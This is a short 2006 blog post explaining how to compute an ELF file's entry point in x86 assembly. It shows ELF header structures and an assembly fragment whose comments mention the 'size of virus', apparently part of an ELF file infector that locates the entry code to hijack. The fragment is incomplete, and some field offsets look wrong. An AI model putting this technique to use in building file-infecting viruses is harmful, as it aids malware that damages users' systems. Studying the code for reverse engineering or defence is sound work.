miércoles, octubre 04, 2006

Elf entry calculation in asm

There are two ways to access to the elf fields, directly knowing the offset of the field needed or filling a small structure and then access to the structure field.



main:
...
end:
e_ident:
.long 0
.long 0
.long 0
.long 0
e_type:
.int 0
e_machine:
.int 0
e_version:
.long 0
e_entry:

(structure in at&t format)

ELF struct
  e_ident      dd 4 dup(?)
  e_type       dw ?
  e_machine dw ?
  e_version  dw ?
  e_entry     dd ?
ELF ends

(structure in intel format)

Using a structure is the easy way it only needs a open() and read() syscalls.
But wen some file-image accesses are nedded, is not the best way to make some reads. Is better to map the file and work with pointers.


store_init:
movl $end_vir, %ecx
subl $start_vir, %ecx
movl %ecx,-16(%ebp) # -16 -> size of virus + 5

leal -500(%ebp), %edi # edi -> -500
movl 0x18(%eax), %esi # esi -> RVA e_entry
movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (back-count)

first_ph:
movl 0x1c(%eax), %edx # edx -> RVA e_phoff
addl %eax, %edx # edx -> VA e_phoff

seek_ph:
cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => next ProgramHeader
jna destiny

next_ph:
addl 0x2a(%edx), %edx
loop seek_ph

destiny: ######### THE MAIN KEY ##########
subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr
addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset
addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset
movl %esi, %edx

#EOF

No hay comentarios: